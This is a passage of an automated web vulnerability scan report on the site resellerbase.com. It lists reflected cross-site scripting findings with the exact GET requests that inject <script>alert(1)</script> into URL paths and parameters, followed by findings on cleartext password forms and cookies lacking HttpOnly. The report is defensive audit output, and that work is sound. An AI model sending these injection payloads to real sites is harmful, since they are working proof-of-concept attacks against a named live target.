<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/search.php?keyword=search...adf0b<a>1440e716009&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5626. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ab032<script>alert(1)</script>101dc6743fa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&ab032<script>alert(1)</script>101dc6743fa=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&ab032<script>alert(1)</script>101dc6743fa=1 was not found on this server.</p>
...[SNIP]...

2.5627. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload d8193<a>a91d65ddb66 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/web-hosting/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2d8193<a>a91d65ddb66 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2d8193<a>a91d65ddb66 was not found on this server.</p>
...[SNIP]...

2.5628. http://www.resellerbase.com/web-service/web-hosting/themes/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 63614<script>alert(1)</script>6286447e314 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service63614<script>alert(1)</script>6286447e314/web-hosting/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service63614<script>alert(1)</script>6286447e314/web-hosting/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5629. http://www.resellerbase.com/web-service/web-hosting/themes/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b5e4a<script>alert(1)</script>27fb916a5ce was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hostingb5e4a<script>alert(1)</script>27fb916a5ce/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hostingb5e4a<script>alert(1)</script>27fb916a5ce/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5630. http://www.resellerbase.com/web-service/web-hosting/themes/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6c2fe<script>alert(1)</script>bb75e36fdc6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes6c2fe<script>alert(1)</script>bb75e36fdc6/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes6c2fe<script>alert(1)</script>bb75e36fdc6/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5631. http://www.resellerbase.com/web-service/web-hosting/themes/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload bf814<script>alert(1)</script>2cf1f2bd5f5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/search.phpbf814<script>alert(1)</script>2cf1f2bd5f5?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/search.phpbf814<script>alert(1)</script>2cf1f2bd5f5?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5632. http://www.resellerbase.com/web-service/web-hosting/themes/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 19224<a>1c983599c95 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/web-hosting/themes/search.php?keyword=search...&Submit3=Search19224<a>1c983599c95&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/search.php?keyword=search...&Submit3=Search19224<a>1c983599c95&opt=2 was not found on this server.</p>
...[SNIP]...

2.5633. http://www.resellerbase.com/web-service/web-hosting/themes/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 17f56<a>7557db9a4b9 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/web-hosting/themes/search.php?keyword=search...17f56<a>7557db9a4b9&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/search.php?keyword=search...17f56<a>7557db9a4b9&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5634. http://www.resellerbase.com/web-service/web-hosting/themes/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 1777d<script>alert(1)</script>d6f7f9ecee2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/search.php?keyword=search...&Submit3=Search&opt=2&1777d<script>alert(1)</script>d6f7f9ecee2=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/search.php?keyword=search...&Submit3=Search&opt=2&1777d<script>alert(1)</script>d6f7f9ecee2=1 was not found on this server.</p>
...[SNIP]...

2.5635. http://www.resellerbase.com/web-service/web-hosting/themes/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 87fd4<a>f4b3798d1ca was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/web-hosting/themes/search.php?keyword=search...&Submit3=Search&opt=287fd4<a>f4b3798d1ca HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/search.php?keyword=search...&Submit3=Search&opt=287fd4<a>f4b3798d1ca was not found on this server.</p>
...[SNIP]...

3. Cleartext submission of password previous next
There are 3 instances of this issue:

/login.php
/login.php/
/register.php

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

3.1. http://www.resellerbase.com/login.php previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/login.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.resellerbase.com/login.php

The form contains the following password field:

password

Request

GET /login.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 21:27:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9175

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Login</title>
<meta
...[SNIP]...
<br />

<form action="login.php" method="post">
<input type="hidden" name="pflag" value="login" />
...[SNIP]...
<td><input class="text3" type="password" name="password" size="40" value="" /></td>
...[SNIP]...

3.2. http://www.resellerbase.com/login.php/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/login.php/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.resellerbase.com/login.php/login.php

The form contains the following password field:

password

Request

GET /login.php/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:17:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9175

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Login</title>
<meta
...[SNIP]...
<br />

<form action="login.php" method="post">
<input type="hidden" name="pflag" value="login" />
...[SNIP]...
<td><input class="text3" type="password" name="password" size="40" value="" /></td>
...[SNIP]...

3.3. http://www.resellerbase.com/register.php previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/register.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.resellerbase.com/register.php

The form contains the following password fields:

password
password2

Request

GET /register.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 22:57:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9341

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Register</title>
<me
...[SNIP]...
<br />

<form action="register.php" method="post">
<input type="hidden" name="pflag" value="register" />
...[SNIP]...
<td><input class="text3" type="password" name="password" size="40" value="" /></td>
...[SNIP]...
<td><input class="text3" type="password" name="password2" size="40" value="" /></td>
...[SNIP]...

4. Cookie without HttpOnly flag set previous next
There are 122 instances of this issue:

/
/a
/adult/
/adult/media-chat/
/adult/media-chat/more2.html
/adult/media-chat/search.php
/adult/more2.html
/adult/personals-dating/
/adult/personals-dating/search.php
/adult/search.php
/browsepr.php
/communication/
/communication/broadband/
/communication/broadband/search.php
/communication/mobile-content/
/communication/mobile-content/search.php
/communication/search.php
/detail/10/rating.php
/detail/11/rating.php
/detail/12/rating.php
/detail/13/rating.php
/detail/14/rating.php
/detail/15/rating.php
/detail/16/rating.php
/detail/17/rating.php
/detail/18/rating.php
/detail/19/rating.php
/detail/20/rating.php
/detail/22/rating.php
/detail/23/rating.php
/detail/26/rating.php
/detail/28/rating.php
/detail/29/rating.php
/detail/30/rating.php
/detail/31/rating.php
/detail/32/rating.php
/detail/33/rating.php
/detail/34/rating.php
/detail/35/rating.php
/detail/36/rating.php
/detail/37/rating.php
/detail/38/rating.php
/detail/39/rating.php
/detail/4/rating.php
/detail/40/rating.php
/detail/41/rating.php
/detail/42/rating.php
/detail/44/rating.php
/detail/45/rating.php
/detail/46/rating.php
/detail/5/rating.php
/detail/6/rating.php
/detail/7/rating.php
/detail/8/rating.php
/detail/9/rating.php
/goods-wholesale/
/power_search.php
/resources-information/ebooks/
/tag/TGP
/tag/VOIP
/tag/adult
/tag/adult+content
/tag/broadband
/tag/cam
/tag/cellular
/tag/chat
/tag/dating
/tag/domain
/tag/domain+name
/tag/domain+names
/tag/domains
/tag/dropshipper
/tag/eBook
/tag/flights
/tag/googlepr.php
/tag/host
/tag/hosting
/tag/hotel
/tag/internet+access
/tag/master+resell+rights
/tag/mobile
/tag/personals
/tag/phone
/tag/private+label
/tag/resel
/tag/resell
/tag/reseller+programs
/tag/reseller+rights
/tag/resellers
/tag/reselling
/tag/ringtones
/tag/script
/tag/search.php
/tag/sex
/tag/singels
/tag/software
/tag/telephone
/tag/themes/kosmos/images/rating/search.php
/tag/themes/kosmos/images/review/search.php
/tag/themes/kosmos/images/search.php
/tag/themes/kosmos/search.php
/tag/themes/search.php
/tag/travel
/tag/uk
/tag/vaccation
/tag/video
/tag/web+cam
/tag/web+hosting
/tag/webcam
/tag/white+label
/travel-vaccation/
/travel-vaccation/search.php
/web-service/
/web-service/domain-names/
/web-service/domain-names/search.php
/web-service/other/
/web-service/other/search.php
/web-service/search.php
/web-service/software-scripts/
/web-service/software-scripts/search.php
/web-service/web-hosting/
/web-service/web-hosting/search.php

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

4.1. http://www.resellerbase.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=8fd7ea683f7a8d29035c1d87ef6494ca; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://www.bing.com/search?q=resellerbase.com&src=IE-SearchBox&Form=IE8SRC
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.resellerbase.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 22:54:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=8fd7ea683f7a8d29035c1d87ef6494ca; path=/
Vary: User-Agent
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 47555

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>TOP 100 Reseller pro
...[SNIP]...

4.2. http://www.resellerbase.com/a previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/a

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /a HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/a
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Thu, 18 Nov 2010 00:11:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /a
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.3. http://www.resellerbase.com/adult/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /adult/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:28:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /adult/
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.4. http://www.resellerbase.com/adult/media-chat/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /adult/media-chat/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:29:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /adult/media-chat/
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

